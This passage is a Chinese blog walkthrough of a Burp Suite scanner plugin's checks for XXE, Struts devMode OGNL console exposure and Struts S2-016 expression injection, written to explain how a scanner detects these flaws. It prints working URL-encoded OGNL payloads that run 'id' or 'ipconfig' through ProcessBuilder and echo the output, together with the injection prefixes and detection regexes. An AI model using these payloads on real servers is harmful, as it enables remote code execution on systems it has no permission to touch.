%s用burp自带的dnslog接口
IBurpCollaboratorClientContext collaboratorContext = callbacks.createBurpCollaboratorClientContext(); String currentCollaboratorPayload = collaboratorContext.generatePayload(true);- 1
- 2
- 3
发送请求
byte[] checkRequest = insertionPoint.buildRequest(xxePayload.getBytes()); IHttpRequestResponse checkRequestResponse = callbacks.makeHttpRequest(baseRequestResponse.getHttpService(), checkRequest);- 1
- 2
match就看dns结果啦
【9】ApacheStrutsDebugMode(debug页面泄露)
先判断URL是不是java
很粗,前面文章已经讲过了。List notJ2EETechs = new ArrayList<>(); notJ2EETechs.add("php"); notJ2EETechs.add("asp"); notJ2EETechs.add("cgi"); notJ2EETechs.add("pl"); return (!notJ2EETechs.contains(curExtension));- 1
- 2
- 3
- 4
- 5
- 6
- 7
老样子
去除所有入参//Remove URI parameters for (IParameter param : parameters) { rawrequest = callbacks.getHelpers().removeParameter(rawrequest, param); }- 1
- 2
- 3
- 4
新增参数,debug=console
rawrequest = callbacks.getHelpers().addParameter(rawrequest, callbacks.getHelpers().buildParameter("debug", "console", IParameter.PARAM_URL) );- 1
- 2
- 3
如果返回包match
private static final byte[] GREP_STRING = "'OGNL Console'".getBytes();- 1
则存在漏洞,表达式注入。
看着像后门
http://www.pwntester.com/blog/2014/01/21/struts-2-devmode-an-ognl-backdoor/
【10】ApacheStrutsS2016(表达式注入)-(S2-016)
这里准备了两个payload
payloads.add("${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27id%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}"); payloads.add("${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cmd.exe%27,%27/c%20ipconfig.exe%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}");- 1
- 2
- 3
一个是适配linux一个是windows
简单看看payload语法${ #a=(new java.lang.ProcessBuilder(new java.lang.String[]{'cmd.exe','/c ipconfig.exe'})).start(), #b=#a.getInputStream(), #c=new java.io.InputStreamReader(#b), #d=new java.io.BufferedReader(#c), #e=new char[50000], #d.read(#e), #matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'), #matt.getWriter().println(#e), #matt.getWriter().flush(), #matt.getWriter().close() }- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
对比看下正常java 调用java.lang.ProcessBuilder执行命令的实例
import java.io.BufferedReader; import java.io.IOException; import java.io.InputStream; import java.io.InputStreamReader; public class ProcessTest { public static void main(String args[]) { ProcessBuilder pb = new ProcessBuilder(); pb.command(new String[] { cmd }); try { Process process = pb.start(); InputStream stdout = process.getInputStream(); InputStreamReader isr = new InputStreamReader(stdout); BufferedReader br = new BufferedReader(isr); String line = null; while ( (line = br.readLine()) != null) System.out.println(line); int exitVal = process.waitFor(); System.out.println(exitVal); } catch (IOException e) { e.printStackTrace(); } catch (InterruptedException e) { e.printStackTrace(); } } }- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
实际也就是增加了一个httprsp的回显,比较清晰
上面的payload循环放到参数,如下参数都有可能存在漏洞List<String> redirectMeth = new ArrayList(); redirectMeth.add("action:"); redirectMeth.add("redirect:"); redirectMeth.add("redirectAction:");- 1
- 2
- 3
- 4
因为我们的payload希望是长成这样
redirect:xxxxx- 1
所以要做一个替换,这里是因为前面只需要remove所有其他参数,剩下的第一个等于号应该是我们加入的这个参数和payload中间。
String utf8rawRequest = new String(rawrequest, "UTF-8"); modifiedRawRequest = utf8rawRequest.replaceFirst("=", "").getBytes();- 1
- 2
如果match到
static { DETECTION_REGEX.add(Pattern.compile("Subnet Mask", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE)); DETECTION_REGEX.add(Pattern.compile("uid=[0-9]+.*gid=[0-9]+.*", Pattern.CASE_INSENSITIVE | Pattern.MULTILINE)); DETECTION_REGEX.add(Pattern.compile("java\\.lang\\.(UNIX)", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE)); }- 1
- 2
- 3
- 4
- 5
- 6
subnet mask是网关的意思,匹配的是win
第三个没太理解,有可能是Win执行了linux的表达式抛出来的异常?后话
前10个漏洞结束。覆盖impl 7/73
-
相关阅读:
常见中间件漏洞复现之【Jboss】!
2022世界人工智能大会|弘玑Cyclone吴迪:人机协作,乃通往数字化未来之“道”
Docker harbor私有仓库部署与管理
面试突击91:MD5 加密安全吗?
本地服务器设置静态ip方法与原理
SpringBoot 跨域配置
java划分每个月的周数及其每周的开始时间和结束时间
【C++提高编程】第一章 模板:函数模板|类模板|
【Axure教程】能增删改数据的动态饼图
Linux调度域与调度组
- 原文地址:https://blog.csdn.net/xiru9972/article/details/126621943